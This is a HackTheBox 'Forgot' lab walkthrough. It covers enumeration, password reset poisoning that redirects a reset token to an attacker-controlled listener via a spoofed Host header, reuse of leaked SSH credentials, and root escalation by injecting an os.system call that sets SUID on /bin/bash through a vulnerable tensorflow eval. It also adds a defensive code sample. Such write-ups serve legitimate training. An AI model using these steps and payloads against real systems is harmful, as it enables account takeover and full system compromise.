HackTheBox – Forgot Walkthrough – In English
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nmap -A 10.10.11.188
Here we have a way to enumerate users (for instance, admin exists):
If we take a look at the response headers, we see that the server uses Python (probably Flask) and there are references to Varnish:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# curl -I 10.10.11.188
Varnish is a web cache, as shown in www.varnish-software.com:
Actually, this is noticeable when requesting the same resource multiple times. The first response takes about 2 seconds to return, whereas the following requests to the same resource only take a few milliseconds:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# time curl '10.10.11.188/forgot?username=admin' -s >/dev/null
┌──(root㉿kali)-[/home/kali/Downloads]
└─# time curl '10.10.11.188/forgot?username=admin' -s >/dev/null
┌──(root㉿kali)-[/home/kali/Downloads]
└─# time curl '10.10.11.188/forgot?username=admin' -s >/dev/null
┌──(root㉿kali)-[/home/kali/Downloads]
└─# time curl '10.10.11.188/forgot?username=asdf' -s >/dev/null
┌──(root㉿kali)-[/home/kali/Downloads]
└─# time curl '10.10.11.188/forgot?username=asdf' -s >/dev/null
┌──(root㉿kali)-[/home/kali/Downloads]
└─# time curl '10.10.11.188/forgot?username=asdf' -s >/dev/null
┌──(root㉿kali)-[/home/kali/Downloads]
└─# ffuf -w /home/kali/Downloads/SecLists/Discovery/Web-Content/raft-small-words.txt -u http://10.10.11.188/FUZZ
Password reset poisoning
Since there are no more functionalities in the website and common injections do not work (SQLi / NoSQLi), we need to do a bit of research. The name of the machine ("Forgot") and the functionality to reset forgotten passwords are hints to the attack we need to perform. There is a good post by portswigger.net explaining how password reset poisoning works.
The key is to enter the IP address of a server we control in the Host header, so that the cached response gets poisoned. Then, the legitimate user will visit our server with the reset token, because the link was built from the poisoned Host header:
Source: https://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning
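As an added example (not code from the walkthrough or from the box), here is the reset-link pattern the attack relies on next to a hardened form that takes the link origin from server configuration, refuses Host values outside an allowlist, and marks reset responses as uncacheable; CANONICAL_BASE and the allowed hostnames are constructed placeholders.

```python
import re
from typing import Optional
from urllib.parse import quote

# Constructed configuration (placeholders, not values from the box): the public
# origin of the application and the Host values it legitimately answers to.
CANONICAL_BASE = "https://forgot.example"
ALLOWED_HOSTS = {"forgot.example", "www.forgot.example"}

# hostname or bracketed IPv6 literal, with an optional :port
_HOST_RE = re.compile(r"^([a-z0-9.-]+|\[[0-9a-f:.]+\])(?::\d{1,5})?$")


def vulnerable_reset_link(host_header: str, token: str) -> str:
    """The pattern the attack relies on: the link origin is copied from the
    client-controlled Host header, so a spoofed Host lands in the reset link
    (and, behind a cache such as Varnish, in the cached response)."""
    return f"http://{host_header}/reset?token={quote(token, safe='')}"


def host_is_trusted(host_header: str) -> bool:
    """Allowlist check on the Host header: case-insensitive, tolerates a port,
    and rejects anything with userinfo, paths or other junk in it."""
    match = _HOST_RE.match((host_header or "").strip().lower())
    return match is not None and match.group(1) in ALLOWED_HOSTS


def safe_reset_link(host_header: str, token: str) -> Optional[str]:
    """Hardened form: the origin comes from server configuration, never from
    the request, and an untrusted Host is refused so that a poisoned response
    is never generated (and therefore never cached) in the first place."""
    if not host_is_trusted(host_header):
        return None
    return f"{CANONICAL_BASE}/reset?token={quote(token, safe='')}"


def reset_response_headers() -> dict:
    """Headers the /forgot and /reset responses should carry so that a shared
    cache never stores a per-user reset response."""
    return {"Cache-Control": "no-store, private", "Pragma": "no-cache"}
```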
The attack seems simple. But first of all, we need to find a valid user other than admin.
Unexpectedly, there was an HTML comment in the main page with a random user:
Let's switch to curl to poison the cache while listening on port 80 with nc:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nc -nlvp 80
┌──(root㉿kali)-[/home/kali/Downloads]
└─# curl '10.10.11.188/forgot?username=robert-dev-87120' -H 'Host: 10.10.14.75'
After a few seconds, we receive a hit in nc:
Incredible, we have the password reset token. Let's change the password, then:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# curl '10.10.11.188/reset?token=MF4w1hJxE1UEomikyvZQs90ENtIXSwMbnFfn6zaVpMbkgwQllegKJobhMP31K5e1VfEpmDruujw9hyEat8juvA%3D%3D' -d 'password=asdf'
Now we click on the Send button and capture the request.
to=Admin&link=http://10.10.11.188/static/sam.css&reason=&issue=Getting error while accessing search feature in enterprise platform.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# curl -I http://10.10.11.188/static/sam.css
Now copy the cookie value, update the cookie in the browser, and then try to access /admin_ticket.
Username:diego Password: dCb#1!x0%gjq
┌──(root㉿kali)-[/home/kali/Downloads]
└─# ssh diego@10.10.11.188
diego@forgot:~$ sudo -l
We are able to run a Python script as root with sudo. This is the script:
diego@forgot:~$ cat /opt/security/ml_security.py
Everything is correct, so we can't get easy code execution by modifying the script or serializing some malicious payload with pickle. There are no library hijacking options either, since sudo resets the environment variables.
Code injection
The script is related to Machine Learning, but there is a suspicious function being used:
Yes, preprocess_input_exprs_arg_string. This function comes from tensorflow, and doesn't look to be related to Machine Learning. In fact, if we search a bit, we will find that this function is vulnerable to code injection. More information at security.snyk.io.
Indeed, the installed version of tensorflow is vulnerable:
diego@forgot:~$ pip freeze | grep tensorflow
The injection occurs in that function because it uses eval. Therefore, we can run arbitrary Python code as root (because we are using sudo).
The variable called data comes from the database:
diego@forgot:~$ mysql --user=diego --password='dCb#1!x0%gjq' --database=app
mysql> show databases;
mysql> use app;
mysql> show tables;
mysql> insert into escalate (reason) values ('x = exec("""__import__("os").system("chmod 4755 /bin/bash")""")');
mysql> exit
Now we will run the script with sudo and successfully change the /bin/bash permissions:
diego@forgot:~$ ls -l /bin/bash
diego@forgot:~$ sudo /opt/security/ml_security.py
diego@forgot:~$ ls -l /bin/bash
diego@forgot:~$ bash -p
@SAKSHAM DIXIT
I need to spend some time learning much more or understanding more.